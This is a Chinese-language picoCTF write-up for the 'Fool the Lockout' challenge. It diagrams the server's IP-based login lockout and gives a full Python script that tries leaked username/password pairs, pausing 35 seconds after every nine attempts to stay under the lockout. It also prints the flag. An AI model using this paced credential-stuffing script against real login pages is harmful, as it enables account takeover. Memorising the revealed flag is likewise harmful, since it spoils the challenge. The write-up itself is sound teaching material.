Fool the Lockout writeup

2026-04-29 2026-04-29

解題

下載題目的程式碼 觀察程式碼鎖定邏輯

  flowchart LR
    A([🔵 收到請求]) --> B

    B["📡 取得客戶端 IP
    ───────────────
    request.remote_addr"]

    B --> C["🗄️ 刷新資料庫
    ───────────────
    refresh_request_rates_db(ip)"]

    C --> D{IP 已在 DB？}

    D --❌ 否--> E["🆕 建立新紀錄
    ───────────────
    num_requests = 0
    epoch_start = -1
    lockout_until = -1"]

    E --> F
    D --✅ 是--> F

    F{是 POST 請求？}

    F --❌ 否--> I
    F --✅ 是--> H["➕ 累計失敗次數
    ───────────────
    num_requests += 1
    若 epoch = -1 則開始計時"]

    H --> I

    I{num_requests > MAX_REQUESTS？}

    I --❌ 否--> J([✅ return False\n放行請求])

    I --✅ 是--> K{lockout_until == -1？}

    K --✅ 是，首次超限--> L["🔒 設定鎖定時間
    ───────────────
    lockout_until =
    curr_time + 120秒"]

    L --> M
    K --❌ 否，已鎖定--> M

    M([🚫 return True\n拒絕請求])

    style A fill:#4A90D9,stroke:#2C5F8A,color:#fff
    style J fill:#27AE60,stroke:#1A7A42,color:#fff
    style M fill:#E74C3C,stroke:#A93226,color:#fff
    style E fill:#F0F4FF,stroke:#7B9ED9,color:#2C3E50
    style H fill:#FFF8E7,stroke:#F0A500,color:#7A5000
    style L fill:#FFE8E8,stroke:#E74C3C,color:#8B0000
    style B fill:#EAF4FB,stroke:#7FB3D3,color:#1A5276
    style C fill:#EAF4FB,stroke:#7FB3D3,color:#1A5276

補充:
client_ip = request.remote_addr
這個是直接取得真實的ip,無法使用X-Forwarded-For、X-Real-IP來作為改變ip的方法

查看題目給的密碼辭典格式 查看封包請求格式 使用python requests模組撰寫自動嘗試登入的程式,並在第9次後暫停30秒間隔時間（保險點可以設35秒）,避免被鎖定

import time

import requests
username=[]
password=[]
with open("creds-dump.txt","r") as f:
    for line in f.readlines():
        parts = line.strip().split(';')
        username.append(parts[0])
        password.append(parts[1])
url="http://candy-mountain.picoctf.net:61238/login"
headers={
"Content-Length": "25",
"Cache-Control": "max-age=0",
"Accept-Language": "zh-TW,zh;q=0.9",
"Origin": "http://candy-mountain.picoctf.net:61238",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://candy-mountain.picoctf.net:61238/login",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
for i in range(0,len(username)):
    if i%9==0 and i!=0:
        print("Run 9 Sleep for 35 seconds to avoid rate limit...")
        time.sleep(35)
    data={
        "username":username[i],
        "password":password[i],
    }
    r=requests.post(url,data=data,headers=headers)
    if '<p class="error-message">Invalid username or password.</p>' not in r.text:
        print("Trying username: " + username[i] + " password: " + password[i]+" success!!")
        print(r.text)
        break
    print("Trying username: " + username[i] + " password: " + password[i]+" error!!")

執行程式,取得正確密碼 使用正確密碼登入 取得flag

picoCTF{f00l_7h4t_l1m1t3r_b9fcf635}

Fool the Lockout writeup

解題

提交flag

說些什麼吧！